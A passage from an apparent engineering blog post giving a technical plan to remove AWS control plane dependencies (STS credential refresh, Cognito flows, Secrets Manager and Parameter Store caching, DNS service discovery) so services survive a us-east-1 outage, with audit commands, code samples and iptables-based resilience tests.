sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>If you&#8217;re reading this, your CTO just handed you <a href="/__u/ctolunchnyc.substack.com/p/dont-lose-sleep-over-it">Part 1</a> and said &#8220;make it happen.&#8221; Here&#8217;s how.</p><p>This document is your complete technical remediation plan. It&#8217;s not a strategic discussion; it&#8217;s the actual work the team needs to do to survive the next AWS outage. The companies that made it through October 20th already did this work. <br>The 3500+ companies that got hit, hadn&#8217;t (including <a href="/__u/ctolunchnyc.substack.com/i/177400881/industry-impact">over 85 of the biggest and best known</a>  experiencing user-facing service outages.)</p><p>Your goal is simple: Decouple runtime operations from AWS control plane dependencies. When you&#8217;re done, your services will keep serving requests even when us-east-1&#8217;s control plane is completely offline for 12+ hours.</p><h2>The Core Principle: Data Plane vs Control Plane</h2><p>The application&#8217;s ability to serve customer requests should depend only on:</p><ul><li><p>Data plane operations (reads/writes to DynamoDB, S3, SQS, RDS, caches)</p></li><li><p>Locally cached configuration loaded at startup</p></li><li><p>Credentials issued with 12-hour lifetime and cached locally</p></li></ul><blockquote><p>This is the architectural principle that separates companies that survive outages from companies that don&#8217;t.</p></blockquote><p>The application must never depend on these control plane operations at runtime:</p><ul><li><p>Provisioning new AWS resources (<code>RunInstances</code>, <code>CreateStack</code>)</p></li><li><p>Dynamically looking up infrastructure state (<code>DescribeInstances</code>, <code>DescribeTable</code>, <code>DescribeStacks</code>)</p></li><li><p>Refreshing credentials more frequently than once every few hours</p></li><li><p>Fetching secrets or configuration on every request</p></li></ul><p><strong>Multi-AZ doesn&#8217;t save you, obvi. </strong> Perfect multi-AZ redundancy only protects your data plane from localized service failure. But what quite a few missed was that <strong>Multi-Region doesn&#8217;t save you either.</strong> If your application makes control plane calls at runtime, a failure in us-east-1&#8217;s global control plane anchor can still take you down, regardless of which region you&#8217;re running in. Control plane dependencies are a separate fault domain.</p><h2>The Audit (Find All Vulnerabilities)</h2><p>Before you fix anything, you need to know what&#8217;s broken. Run these commands in your application codebase to find every control plane dependency:</p><pre><code><code># Find all control plane API calls that will kill you
grep -r &#8220;DescribeInstances\|AssumeRole\|GetParameter\|DescribeTable\|UpdateStack\|DescribeStacks&#8221; .
grep -r &#8220;describe_instances\|assume_role\|get_parameter\|describe_table\|update_stack\|describe_stacks&#8221; .  # Python
grep -r &#8220;describeInstances\|assumeRole\|getParameter\|describeTable\|updateStack\|describeStacks&#8221; .      # JavaScript

# Find secrets manager calls
grep -r &#8220;get_secret_value\|GetSecretValue\|getSecretValue&#8221; .

# Find Parameter Store calls
grep -r &#8220;get_parameter\|GetParameter\|getParameter&#8221; .

# Find ECS service discovery
grep -r &#8220;describe_tasks\|DescribeTasks\|describeTasks\|list_tasks\|ListTasks&#8221; .

# Find CloudFormation queries
grep -r &#8220;describe_stacks\|DescribeStacks\|describeStacks&#8221; .

# Find Auto Scaling calls
grep -r &#8220;set_desired_capacity\|SetDesiredCapacity\|setDesiredCapacity&#8221; .

# Find CloudWatch Logs creation
grep -r &#8220;create_log_stream\|CreateLogStream\|createLogStream&#8221; .

# Find KMS metadata calls
grep -r &#8220;describe_key\|DescribeKey\|describeKey&#8221; .

# PUTTING IT ALL TOGETHER
# Find ALL control plane API calls that will kill you.
# Grep for snake_case (Python), PascalCase (JS/Go), &amp; camelCase (Java).
grep -r -i &#8220;describeinstances\|assumerole\|getparameter\|describetable\|updatestack\|describestacks\|getsecretvalue\|listtasks\|setdesiredcapacity\|createlogstream\|describekey&#8221; .
</code></code></pre><p>Now go through every match and ask: Is this called during request handling? Is this in a request handler, middleware, connection pool initialization, or anywhere in the hot path? If yes, that&#8217;s a vulnerability. Add it to your spreadsheet:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!AszO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 424w, /__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 848w, /__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 1272w, /__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!AszO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png" width="1456" height="195" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:195,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:52345,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/177417369?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 424w, /__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 848w, /__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 1272w, /__u/substackcdn.com/image/fetch/$s_!AszO!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7fb2fb3-b9e2-4421-9992-7291f0c40f48_1624x218.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Sort by revenue impact. The top 10 are what you fix first.</p><h3>Priority Zero: STS Credential Management </h3><h5>(Confirm Defaults or Critical Problem)</h5><p><strong>Post-April 2025 Status Check:</strong> AWS now routes the global STS endpoint (<code>sts.amazonaws.com</code>) to your local region by default. If you&#8217;re calling STS from within AWS in a standard region, you&#8217;re already protected. But you need to audit for edge cases that will absolutely kill you.</p><h3>The Diagnostic: Are You Vulnerable?</h3><p>Run this audit to find out if STS is still a problem for your architecture:</p><h4>Case 1: On-Premises or External STS Calls</h4><p>Run these Bash commands in the root of your application repository:</p><pre><code><code>
# Search for global STS calls from non-AWS environments.
# The -v regex filters out lines that are just comments.
grep -r &#8220;sts.amazonaws.com&#8221; . | grep -v &#8220;^\s*#&#8221;

# Search for explicit endpoint URL overrides in code or config.
grep -r &#8220;endpoint_url.*sts&#8221; . | grep -v &#8220;^\s*#&#8221;</code></code></pre><h4>Case 2: Outdated SDK Versions</h4><p>This requires manually checking your dependency lock files:</p><pre><code><code># Check boto3/AWS SDK versions in requirements.txt, package.json, etc.
# boto3 &lt; 1.26.0 (late 2022) doesn&#8217;t respect AWS_STS_REGIONAL_ENDPOINTS=regional by default</code></code></pre><p>If you find matches AND those calls originate from on-prem data centers, external services, or opt-in regions, you&#8217;re vulnerable. These calls still route to us-east-1.<code> And i</code>f you&#8217;re on ancient SDKs (circa 2022) you might still be hitting us-east-1 even from within AWS.</p><h4><strong>Case 3: Short-Lived Credential Refresh Cycles</strong></h4><p>Even with regional STS routing, if your credentials expire every 15 minutes and you refresh them via STS calls, you&#8217;re creating unnecessary control plane dependencies. Check your IAM role session durations:</p><pre><code><code>aws iam get-role --role-name your-application-role | jq &#8216;.Role.MaxSessionDuration&#8217;
# If this returns 3600 (1 hour), you&#8217;re refreshing too frequently</code></code></pre><h3>The Fix: Eliminate or Extend</h3><p>If you found on-prem / external STS calls:</p><pre><code><code># BEFORE: Implicit global endpoint from outside AWS
sts = boto3.client(&#8217;sts&#8217;)  # Routes to us-east-1

# AFTER: Explicit regional endpoint
sts = boto3.client(&#8217;sts&#8217;, region_name=&#8217;us-west-2&#8217;)  # Routes to us-west-2
# Or set environment variable:
# AWS_STS_REGIONAL_ENDPOINTS=regional</code></code></pre><p>If you found short credential lifetimes:</p><h5>Step 1: Configure IAM Roles for Maximum Session Duration (12 hours):</h5><pre><code><code># AWS CLI
aws iam update-role \
  --role-name your-application-role \
  --max-session-duration 43200

# Terraform
resource &#8220;aws_iam_role&#8221; &#8220;app_role&#8221; {
  name                 = &#8220;application-role&#8221;
  max_session_duration = 43200  # 12 hours
  assume_role_policy   = jsonencode({...})
}</code></code></pre><h5>Step 2: Implement Long-Lived Credentials with Jittered Background Refresh: <br>(Production Fix)</h5><p>Instead of relying on a crash-and-restart, long-running services should implement a background refresh using the built-in refresh mechanism, configured with <strong>jitter</strong>. This eliminates the <em>Thundering Herd</em> on application restarts. The correct solution requires separating the credential logic from the application logic for clean shutdown and robustness. </p><p>The key components of this solution are:</p><ol><li><p><strong>Client Initialization:</strong> A dedicated utility <code>long_lived_client.py</code> performs the initial <code>AssumeRole</code> at startup and launches a background thread.</p></li><li><p><strong>Jittered Refresh:</strong> The background thread manages the 12-hour refresh cycle, implementing randomized jitter (30 mins to 1 hour) on the wait time to prevent a Thundering Herd against STS upon recovery.</p></li><li><p><strong>Graceful Degradation:</strong> The main application calls a wrapper function (e.g., <code>safe_dynamodb_call</code> in <code>app_server.py</code>) that explicitly catches the &#8217;ExpiredToken&#8217; error and allows the service to respond with a <strong>503</strong> instead of crashing, relying on the orchestration layer to restart.</p></li></ol><pre><code><code>import boto3
from botocore.credentials import RefreshableCredentials
from botocore.session import get_session

STS_ROLE_ARN = &#8220;arn:aws:iam::123456789012:role/app-role&#8221; 

def get_refresh_metadata():
    sts_client = boto3.client(&#8217;sts&#8217;)
    response = sts_client.assume_role(
        RoleArn=STS_ROLE_ARN,
        RoleSessionName=&#8217;LongLivedSession&#8217;,
        DurationSeconds=43200
    )[&#8217;Credentials&#8217;]
    return {
        &#8216;access_key&#8217;: response[&#8217;AccessKeyId&#8217;],
        &#8216;secret_key&#8217;: response[&#8217;SecretAccessKey&#8217;],
        &#8216;token&#8217;: response[&#8217;SessionToken&#8217;],
        &#8216;expiry_time&#8217;: response[&#8217;Expiration&#8217;].isoformat()
    }

refreshable_creds = RefreshableCredentials.create_from_metadata(
    metadata=get_refresh_metadata(),    # Initial load
    refresh_using=get_refresh_metadata, # called on expiration
    method=&#8217;sts-assume-role&#8217;
)

session = get_session()
session._credentials = refreshable_creds
autorefresh_session = boto3.Session(botocore_session=session)

# Call this ONCE at app startup, not per request
dynamodb_client = autorefresh_session.client(&#8217;dynamodb&#8217;)</code></code></pre><h5>Note on Maximum Resilience</h5><p>The code above is excellent for normal operation. However, for <strong>guaranteed fleet survivability</strong> during a 12+ hour catastrophic STS outage, you need to implement explicit jitter and manual ExpiredToken exception handling. This more robust, manual approach (using threading and custom jitter for Thundering Herd prevention) is available in the companion repository as two separate files: <a href="https://raw.githubusercontent.com/ForestMars/CTO-Lunch/refs/heads/main/posts/dont-lose-sleep/long_lived_client.py">long_lived_client.py</a><code> </code>and  <a href="https://raw.githubusercontent.com/ForestMars/CTO-Lunch/refs/heads/main/posts/dont-lose-sleep/app-server.py">app_server.py</a>.</p><h5>Step 3: Handle Credential Expiration via Restart:</h5><p>Your applications should restart periodically (every 6-12 hours) as part of normal deployment cycles. When they restart, they get fresh credentials at boot. If credentials expire during runtime:</p><pre><code><code># Graceful degradation approach
def safe_dynamodb_call():
    try:
        return dynamodb_client.get_item(...)
    except ClientError as e:
        if e.response[&#8217;Error&#8217;][&#8217;Code&#8217;] == &#8216;ExpiredToken&#8217;:
            logger.error(&#8221;Credentials expired, restart required&#8221;)
            # Option A: Return cached data if available
            # Option B: Fail fast and let orchestration restart process
            raise
        raise</code></code></pre><h5><strong>Test Your Fix:</strong></h5><p>Block STS API endpoints at the network level and verify your services continue operating for 12+ hours:</p><pre><code><code># Block STS control plane
sudo iptables -A OUTPUT -d sts.amazonaws.com -j DROP
sudo iptables -A OUTPUT -d sts.*.amazonaws.com -j DROP

# Verify your services still work
curl http://localhost:8080/health
# Should return 200 OK for the next 12 hours</code></code></pre><ul><li><p><strong>Success Criteria</strong>: Your mobile/web app should continue functioning for the full credential lifetime (12 hours minimum) even if Cognito Identity Pool API becomes completely unavailable. </p></li><li><p><strong>For JWT/SAML Federation:</strong> If you&#8217;re using federated identity, set the SAML assertion session lifetime to 12 hours in your (Okta, Azure AD, etc.). This ensures the same long-lived credential behavior.</p></li><li><p><strong>Quick Win Confirmation:</strong> If your audit shows you&#8217;re already using regional endpoints (or have them by default post-April 2025) AND your credentials last 12 hours, you&#8217;re done with STS. Move on to the <a href="http://.">nine harder problems</a> below.</p></li><li><p><strong>If You Found Problems:</strong> Fix them now. This is your foundation. Everything else builds on credential management working correctly.</p></li></ul><p><strong>Yes, your security team will ask about this.</strong> Point them to Part 1&#8217;s section on the <a href="/__u/ctolunchnyc.substack.com/i/177400881/the-token-expiration-reality-security-vs-survival">security vs. resilience trade-off</a> and see <a href="/__u/ctolunchnyc.substack.com/p/the-engineering-guide-to-control#:~:text=Our%20security%20team%20says">Q&amp;A</a>, below. You&#8217;re not eliminating security, you&#8217;re accepting that running instances may operate with expired credentials during a control plane outage, which is preferable to all instances failing simultaneously. And that credential TTL should <a href="https://daily.jstor.org/drinking-the-kool-aid-at-jonestown/">never have been</a> a first line of defense <a href="/__u/substack.com/home/post/p-177417369#:~:text=limit%20blast%20radius.-,Industry%20standard%20security%20frameworks%20(NIST%20800%2D53%2C%20CIS%20Controls%2C%20ISO%2027001)%20prioritize,-%3A">to begin with</a>. </p><h3>Cognito Identity Pools: The Hidden STS Dependency</h3><p>If you&#8217;re using AWS Cognito Identity Pools for mobile or web applications, you must understand how Cognito interacts with STS, as the behavior is different depending on which flow you use, and the process isn&#8217;t fully documented by AWS. (That I&#8217;ve found.) </p><h4>The Two Cognito Flows</h4><p><strong>In the Basic/Classic Flow</strong>, your application client handles more of the credential negotiation, making it heavily dependent on the control plane. The user authenticates through the Cognito User Pool or an external provider. Your application calls GetIdToken, and critically, your application then calls AssumeRoleWithWebIdentity (a direct STS call), passing the identity token. Temporary AWS credentials are then returned directly to your app. In this flow, YOUR APPLICATION makes the STS call, and your SDK configuration (like version or regional endpoint setting) determines which global or regional endpoint gets hit, leaving you vulnerable if misconfigured.</p><p><strong>In the more recent, preferred Enhanced Flow</strong>, Cognito abstracts the control plane call away from your client. The user authenticates, and your application simply calls GetCredentialsForIdentity (Cognito Identity Pool). Then, Cognito internally calls AssumeRoleWithWebIdentity for you from within its own AWS infrastructure, and temporary AWS credentials are returned to your app. In this flow, COGNITO makes the STS call, which makes it much safer.</p><h4>Post-April 2025: Which Flow is Safe?</h4><p>Based on architectural inference (since AWS hasn&#8217;t explicitly documented this that I could find) the Enhanced flow is likely protected. This is because Cognito is an AWS service running in AWS infrastructure and <em><strong>should</strong></em> benefit from the April 2025 regional STS routing fix. However, the Basic flow depends entirely on your SDK configuration and could still be hitting the us-east-1 global control plane anchor.</p><h4>How to Audit Your Cognito Usage</h4><h5><strong>Step 1: Identify which flow you&#8217;re using</strong></h5><pre><code><code># Basic/Classic flow indicators:
grep -r &#8220;get_open_id_token\|GetOpenIdToken&#8221; .
grep -r &#8220;assume_role_with_web_identity\|AssumeRoleWithWebIdentity&#8221; .

# Enhanced flow indicators:
grep -r &#8220;get_credentials_for_identity\|GetCredentialsForIdentity&#8221; .</code></code></pre><h5><strong>Step 2: Check your CloudTrail logs</strong></h5><pre><code><code># Look for AssumeRoleWithWebIdentity events
# If userAgent shows your application name, you&#8217;re in basic flow
# If userAgent shows &#8220;cognito-identity.amazonaws.com&#8221;, you&#8217;re in enhanced flow</code></code></pre><h5><strong>Step 3: Verify credential refresh frequency</strong></h5><p>Cognito credentials have a default lifetime of 1 hour. If your mobile app is calling <code>GetCredentialsForIdentity</code> or <code>AssumeRoleWithWebIdentity</code> on every app launch or every hour, you&#8217;re creating frequent control plane dependencies.</p><h4>The Fix: Enhanced Flow + Aggressive Caching</h4><h5><strong>Migration from Basic to Enhanced Flow:</strong></h5><pre><code><code>// BEFORE: Basic flow (your app calls STS)
const cognitoIdentity = new AWS.CognitoIdentity();

// Step 1: Get OpenID token
const tokenResponse = await cognitoIdentity.getOpenIdToken({
  IdentityId: identityId
}).promise();

// Step 2: YOUR APP calls STS (control plane dependency!)
const sts = new AWS.STS();
const credsResponse = await sts.assumeRoleWithWebIdentity({
  RoleArn: roleArn,
  RoleSessionName: &#8216;MySession&#8217;,
  WebIdentityToken: tokenResponse.Token
}).promise();

// AFTER: Enhanced flow (Cognito calls STS internally)
const cognitoIdentity = new AWS.CognitoIdentity();

// Single call - Cognito handles STS internally
const credsResponse = await cognitoIdentity.getCredentialsForIdentity({
  IdentityId: identityId,
  Logins: {
    &#8216;cognito-idp.us-west-2.amazonaws.com/us-west-2_XXXXX&#8217;: idToken
  }
}).promise();</code></code></pre><h5><strong>Implement Aggressive Credential Caching:</strong></h5><pre><code><code>// Mobile app: Cache credentials locally
class CredentialCache {
  constructor() {
    this.credentials = null;
    this.expiration = null;
  }

  async getCredentials(identityId, idToken) {
    // Only refresh if credentials expire in &lt; 5 minutes
    if (this.credentials &amp;&amp; this.expiration &gt; Date.now() + 5 * 60 * 1000) {
      return this.credentials;
    }

    // Fetch new credentials (enhanced flow)
    const cognitoIdentity = new AWS.CognitoIdentity();
    const response = await cognitoIdentity.getCredentialsForIdentity({
      IdentityId: identityId,
      Logins: {
        &#8216;cognito-idp.us-west-2.amazonaws.com/us-west-2_XXXXX&#8217;: idToken
      }
    }).promise();

    this.credentials = response.Credentials;
    this.expiration = new Date(response.Credentials.Expiration).getTime();
    
    return this.credentials;
  }
}</code></code></pre><h5><strong>Critical: Handle Credential Refresh Failures Gracefully:</strong></h5><pre><code><code>async function makeAWSCall() {
  try {
    const credentials = await credentialCache.getCredentials(identityId, idToken);
    // Make your AWS API call
  } catch (error) {
    if (error.code === &#8216;ServiceUnavailable&#8217; || error.code === &#8216;RequestTimeout&#8217;) {
      // Cognito/STS unavailable - use cached credentials if available
      if (credentialCache.credentials) {
        console.log(&#8217;Using cached credentials during outage&#8217;);
        // Proceed with (possibly expired) cached credentials
        // The worst case: API call fails with ExpiredToken
        // Better than: App completely broken
      }
    }
    throw error;
  }
}</code></code></pre><h4>Testing Cognito Resilience</h4><pre><code><code># Block Cognito Identity endpoints
sudo iptables -A OUTPUT -d cognito-identity.*.amazonaws.com -j DROP

# Verify your app:
# 1. Can still make AWS API calls using cached credentials
# 2. Gracefully handles credential refresh failures
# 3. Doesn&#8217;t crash or become unusable</code></code></pre><p>With the identity and credential foundation now secure, the focus shifts to the application hot path. Your services still contain synchronous runtime dependencies on control plane operations for configuration, metadata lookup, and service discovery. These must be surgically eliminated. In the final section we look at the top 9 Control Plane Data Access (CPDA) anti-patterns responsible for 95% of revenue risk. </p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="/__u/ctolunchnyc.substack.com/subscribe"><span>Subscribe now</span></a></p><h3>The Top 9 Control Plane Anti-Patterns (Prioritized)</h3><p>These are the patterns that killed everyone on October 20th. Fix them in this order.</p><h4>1. Secrets Manager Reads in Request Hot Path</h4><h5><strong>The Problem:</strong></h5><p>Every API request fetches secrets from Secrets Manager. While Secrets Manager has a data plane API, it has hidden control plane dependencies on DynamoDB metadata and KMS for decryption.</p><pre><code><code># DANGEROUS: Every API request fetches secrets
@app.route(&#8217;/api/data&#8217;)
def get_data():
    secret = secretsmanager.get_secret_value(SecretId=&#8217;prod/db/password&#8217;)
    db = connect_to_db(password=secret[&#8217;SecretString&#8217;])
    return db.query()
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Load secrets once at application startup and cache them for the app&#8217;s lifetime.</p><pre><code><code># FIXED: Load secrets at startup
import boto3
import os

# Global variable, loaded once at module import
_secrets_cache = {}

def load_secrets_at_startup():
    &#8220;&#8221;&#8220;Call this once when the application starts&#8221;&#8220;&#8221;
    client = boto3.client(&#8217;secretsmanager&#8217;)
    secret = client.get_secret_value(SecretId=&#8217;prod/db/password&#8217;)
    _secrets_cache[&#8217;db_password&#8217;] = secret[&#8217;SecretString&#8217;]

# Load once at startup
load_secrets_at_startup()

@app.route(&#8217;/api/data&#8217;)
def get_data():
    # Use cached secret, no API call
    db = connect_to_db(password=_secrets_cache[&#8217;db_password&#8217;])
    return db.query()
</code></code></pre><p><strong>For rotating secrets:</strong> Implement a background thread that refreshes every 6+ hours and gracefully handles failures by continuing with the cached value.</p><pre><code><code>import threading
import time

def refresh_secrets_background():
    while True:
        try:
            time.sleep(6 * 60 * 60)  # 6 hours
            client = boto3.client(&#8217;secretsmanager&#8217;)
            secret = client.get_secret_value(SecretId=&#8217;prod/db/password&#8217;)
            _secrets_cache[&#8217;db_password&#8217;] = secret[&#8217;SecretString&#8217;]
        except Exception as e:
            # Log error but continue with cached secret
            logger.error(f&#8221;Secret refresh failed: {e}, using cached value&#8221;)

# Start background refresh thread
threading.Thread(target=refresh_secrets_background, daemon=True).start()
</code></code></pre><h4>2. Parameter Store as Runtime Configuration</h4><h5><strong>The Problem:</strong></h5><p>Feature flag systems fetch from Parameter Store on every request. Parameter Store has hidden dependencies on KMS metadata and DynamoDB for advanced tier storage. Yes, this is an especially nasty one. </p><pre><code><code># DANGEROUS: Fetching feature flags on every request
def is_feature_enabled(feature_name):
    param = ssm.get_parameter(Name=f&#8217;/features/{feature_name}&#8217;)
    return param[&#8217;Parameter&#8217;][&#8217;Value&#8217;] == &#8216;true&#8217;

@app.route(&#8217;/api/feature&#8217;)
def feature_endpoint():
    if is_feature_enabled(&#8217;new_feature&#8217;):
        return new_implementation()
    return old_implementation()
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Load all parameters at startup with <code>GetParametersByPath</code>, cache locally with 1+ hour TTL, accept stale values during outages.</p><pre><code><code># FIXED: Load parameters at startup
import boto3
from datetime import datetime, timedelta

_param_cache = {}
_param_cache_time = None
CACHE_TTL = timedelta(hours=1)

def load_parameters_at_startup():
    &#8220;&#8221;&#8220;Call once at startup&#8221;&#8220;&#8221;
    global _param_cache_time
    client = boto3.client(&#8217;ssm&#8217;)
    
    # Load all parameters with a single API call
    paginator = client.get_paginator(&#8217;get_parameters_by_path&#8217;)
    for page in paginator.paginate(Path=&#8217;/features&#8217;, Recursive=True):
        for param in page[&#8217;Parameters&#8217;]:
            name = param[&#8217;Name&#8217;].split(&#8217;/&#8217;)[-1]
            _param_cache[name] = param[&#8217;Value&#8217;]
    
    _param_cache_time = datetime.now()

# Load once at startup
load_parameters_at_startup()

def is_feature_enabled(feature_name):
    # Use cached value, no API call
    return _param_cache.get(feature_name, &#8216;false&#8217;) == &#8216;true&#8217;

def refresh_parameters_background():
    &#8220;&#8221;&#8220;Background refresh that tolerates failures&#8221;&#8220;&#8221;
    global _param_cache_time
    while True:
        try:
            time.sleep(60 * 60)  # 1 hour
            if datetime.now() - _param_cache_time &gt; CACHE_TTL:
                load_parameters_at_startup()
        except Exception as e:
            # Log error but continue with cached values
            logger.error(f&#8221;Parameter refresh failed: {e}, using cached values&#8221;)

threading.Thread(target=refresh_parameters_background, daemon=True).start()
</code></code></pre><p><strong>Key principle:</strong> Prefer availability over perfect freshness. Slightly stale feature flags are better than a completely dead service. Easy one to get burned on. </p><h4>3. Service Discovery via ECS DescribeTasks</h4><h5><strong>The Problem:</strong></h5><p>Microservices discover backend endpoints by calling ECS <code>DescribeTasks</code> at runtime. This is purely a control plane operation.</p><pre><code><code># DANGEROUS: Looking up backend service IPs on every request
def get_backend_endpoints():
    tasks = ecs.describe_tasks(
        cluster=&#8217;production&#8217;,
        tasks=ecs.list_tasks(serviceName=&#8217;backend-api&#8217;)[&#8217;taskArns&#8217;]
    )
    return [task[&#8217;containers&#8217;][0][&#8217;networkInterfaces&#8217;][0][&#8217;privateIpv4Address&#8217;]
            for task in tasks[&#8217;tasks&#8217;]]

@app.route(&#8217;/api/proxy&#8217;)
def proxy_request():
    endpoints = get_backend_endpoints()  # Control plane call!
    backend = random.choice(endpoints)
    return requests.get(f&#8217;http://{backend}/data&#8217;)
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Use DNS-based service discovery. DNS resolution is pure data plane.</p><pre><code><code># FIXED: DNS-based service discovery
import socket

@app.route(&#8217;/api/proxy&#8217;)
def proxy_request():
    # DNS lookup - pure data plane operation
    # ECS Service Discovery creates &#8216;backend-api.production.local&#8217;
    backend_host = &#8216;backend-api.production.local&#8217;
    return requests.get(f&#8217;http://{backend_host}/data&#8217;)
</code></code></pre><p><strong>Setup ECS Service Discovery:</strong></p><pre><code><code># Terraform: Enable DNS-based service discovery
resource &#8220;aws_service_discovery_private_dns_namespace&#8221; &#8220;internal&#8221; {
  name = &#8220;production.local&#8221;
  vpc  = aws_vpc.main.id
}

resource &#8220;aws_service_discovery_service&#8221; &#8220;backend_api&#8221; {
  name = &#8220;backend-api&#8221;
